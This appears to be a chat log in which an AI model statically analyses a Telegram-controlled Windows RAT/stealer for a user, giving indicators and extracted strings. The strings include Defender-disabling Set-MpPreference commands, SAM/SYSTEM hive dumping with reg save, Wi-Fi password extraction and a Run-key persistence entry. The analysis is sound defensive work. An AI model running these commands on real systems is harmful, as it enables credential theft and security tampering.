logoChat01.ai

Find suspicious strings into it is it malware or ...

Erstellt am: 17. Mai 2026

Beantwortet mit GPT-5.5 Thinking von Chat01

Frage

telegram_bot.exe

Find suspicious strings into it is it malware or what and give me everything what this files can do give me all the important stuff this exe do

Gedanke

I found a hard-coded Telegram bot token and a full command menu in the binary. This is not just a harmless bot; it has RAT/stealer behavior, including command execution, persistence, Defender tampering, credential/hash dumping, keylogging, screenshotting, and file transfer.

Thought for 1m 43s

Antwort

Verdict

Yes — this is malware with high confidence.
telegram_bot.exe is a Telegram-controlled Windows RAT / stealer. I did static analysis only and did not run it.

It contains a hard-coded Telegram bot token, connects to Telegram infrastructure, exposes remote commands, and includes features for surveillance, credential theft, persistence, AV tampering, file exfiltration, command execution, and system disruption.

File identifiers

ItemValue
Filenametelegram_bot.exe
TypePE32+ Windows x64 GUI executable
Size2,437,632 bytes
MD56dd2dfb10d39d0a627dfa149b53b17b4
SHA1b9b518ad5bcc1bde9ddab9e144f3f4ec49353e7f
SHA25642a4ae66ea99cfa32316237f457c8626b5aefe5b49b66b7fd43b205f1025e0de
PE timestampFri May 15 04:32:46 2026
Likely languageRust
Notable build stringssrc/main.rs, /home/kali/.cargo/registry/...

The file appears to be a Rust-built Telegram bot using crates such as teloxide, tokio, reqwest, hyper, serde, and chrono.

Most important finding

The binary contains an embedded Telegram bot token:

8749312864:AAEZ...rwks

I redacted the middle of the token because it is effectively a live credential. Whoever controls that bot can likely issue commands to infected machines. That token should be revoked through Telegram BotFather immediately.

Command menu found inside the EXE

The malware contains this command list:

text
/start
/screen
/clip
/wifi
/wifipass
/keylog
/stoplog
/mic
/history
/lock
/shutdown
/restart
/persist
/disableav
/sysinfo
/record
/myip
/location
/hash
/gethash
/upload <path>
/download <url>
/cmd <command>

This is a full remote-access command set.

What the EXE can do

Remote command execution

It supports:

text
/cmd <command> - Execute command

Suspicious strings:

text
cmd/C
Command executed (no output)
C:\Windows\System32\cmd.exe
powershell

This means the attacker can run arbitrary Windows commands through Telegram.

Telegram command-and-control

Found strings:

text
https://api.telegram.org
GetMe
GetUpdates
SendMessage
Bot Activated
Failed to parse default Telegram bot API url

This strongly indicates the malware polls Telegram for commands and sends results back through Telegram.

Screenshot capture

Found strings:

text
/screen - Take screenshot
screen.png
Screenshot failed

Also found PowerShell screenshot code using:

text
System.Windows.Forms
System.Drawing.Bitmap
CopyFromScreen

So it can capture the victim’s screen and likely send the image back to Telegram.

Screen recording / repeated screenshots

Found strings:

text
/record - Record screen (5 shots)
Recording 5 screenshots...
record_
.png
Recording complete

This looks like it takes 5 screenshot frames, probably saved as record_*.png.

Clipboard theft

Found strings:

text
/clip - Get clipboard content
Get-Clipboard
Clipboard:
Clipboard is empty

It can read clipboard contents, which may expose passwords, crypto addresses, copied tokens, private messages, etc.

Wi-Fi profile and password theft

Found strings:

text
/wifi - List WiFi networks
/wifipass - Extract WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="$profile" key=clear
Key Content
WiFi Passwords:
No WiFi passwords found (run as admin)

It tries to enumerate saved Wi-Fi profiles and extract stored Wi-Fi passwords.

Keylogging attempt

Found strings:

text
/keylog - Start keylogger
/stoplog - Stop keylogger
C:\keylog.txt
Keylogger started. Logging to C:\keylog.txt
Keylogger stopped
taskkill /f /im powershell.exe 2>nul

It claims to start a keylogger and writes to:

text
C:\keylog.txt

The implementation looks crude from the strings and may not be a reliable keylogger, but the intent is clearly malicious.

Browser history theft

Found strings:

text
/history - Browser history
C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\History
Browser History:
No browser history found

It tries to read Chrome browser history from user profiles.

Microphone recording attempt

Found strings:

text
/mic - Record microphone (5 sec)
audio.wav
Microphone recording failed

It appears to try creating an audio file named:

text
audio.wav

The embedded code looks questionable, but the intended feature is microphone capture.

File exfiltration and download

Found strings:

text
/upload <path> - Upload file
/download <url> - Download file
Invoke-WebRequest -Uri '
-OutFile C:\downloaded.exe
File downloaded to C:\downloaded.exe
File not found:

Capabilities:

text
/upload <path>

Likely sends a chosen local file to the attacker through Telegram.

text
/download <url>

Downloads attacker-supplied content to:

text
C:\downloaded.exe

I did not see enough from strings alone to prove it auto-executes the downloaded file, but /cmd can be used to execute it afterward.

Persistence

Found strings:

text
/persist - Add persistence
Persistence added to HKCU\Run\WindowsUpdate
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
WindowsUpdate

It likely adds itself to:

text
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

under the value name:

text
WindowsUpdate

That makes it start automatically when the user logs in.

Windows Defender tampering

Found strings:

text
/disableav - Disable Defender
Windows Defender disabled (requires admin)
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true
Set-MpPreference -SubmitSamplesConsent 2

This is very strong malware evidence. It attempts to disable multiple Microsoft Defender protections.

NTLM / Windows hash dumping

Found strings:

text
/hash - Dump NTLM hashes
/gethash - Get NTLM hash files
NTLM hashes saved. Use /gethash to retrieve
reg save HKLM\SAM C:\sam.save
reg save HKLM\SYSTEM C:\system.save
C:\sam.save
C:\system.save
No hash files found (run /hash first)

This attempts to dump Windows SAM and SYSTEM registry hives, which can be used to extract local password hashes.

This usually requires admin privileges.

System information collection

Found strings:

text
/sysinfo - System information
SYSTEM INFORMATION
Hostname:
OS:
CPU:
RAM:
User:
hostname
whoami
Get-CimInstance Win32_Processor
Get-CimInstance Win32_ComputerSystem
COMPUTERNAME
USERNAME

It collects host/user/system inventory.

Public IP and geolocation lookup

Found URLs:

text
https://api.ipify.org
http://ip-api.com/json/

Found strings:

text
/myip - Public IP address
/location - Geolocation info
Public IP:
Location:
City:
Region:
Country:
Lat:
Lon:
ISP:

It queries external services to identify the victim’s public IP, approximate location, and ISP.

Lock, reboot, and shutdown

Found strings:

text
/lock - Lock workstation
/shutdown - Shutdown PC
/restart - Restart PC
rundll32.exe user32.dll,LockWorkStation
shutdown /r /30 /c
shutdown /s
System restart initiated
System shutdown initiated

It can disrupt the victim’s workstation.

Network indicators

text
https://api.telegram.org
https://api.ipify.org
http://ip-api.com/json/

The main C2 channel appears to be Telegram Bot API.

File/path indicators

text
C:\downloaded.exe
C:\keylog.txt
C:\sam.save
C:\system.save
screen.png
audio.wav
record_*.png

Registry persistence indicator:

text
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate

Suspicious imported APIs

The import table includes capabilities consistent with process execution, networking, file access, registry access, and TLS:

text
CreateProcessW
CreateThread
CreateFileW
DeleteFileW
ReadFile
WriteFileEx
GetEnvironmentVariableW
RegOpenKeyExW
RegQueryValueExW
connect
send
recv
getaddrinfo
crypt32.dll certificate functions
secur32.dll TLS/security functions

No obvious UPX packing was found. Entropy is moderate, so it does not look heavily packed.

Bottom line

This is not a normal Telegram bot. It is a Telegram RAT / stealer with these major capabilities:

text
Remote shell
Telegram C2
Screenshot capture
Clipboard theft
Wi-Fi password extraction
Browser history theft
File upload/exfiltration
File download
Persistence through HKCU Run
Windows Defender disabling
NTLM/SAM/SYSTEM hive dumping
Public IP and location lookup
System info collection
Lock/reboot/shutdown
Keylogging attempt
Microphone recording attempt

Do not run it. If it already ran on a machine, assume that machine is compromised. Disconnect it from the network, revoke the Telegram bot token, check the Run key for WindowsUpdate, collect the hashes above for detection, rotate passwords, and run a full offline/EDR scan.

Diesen Q&A teilen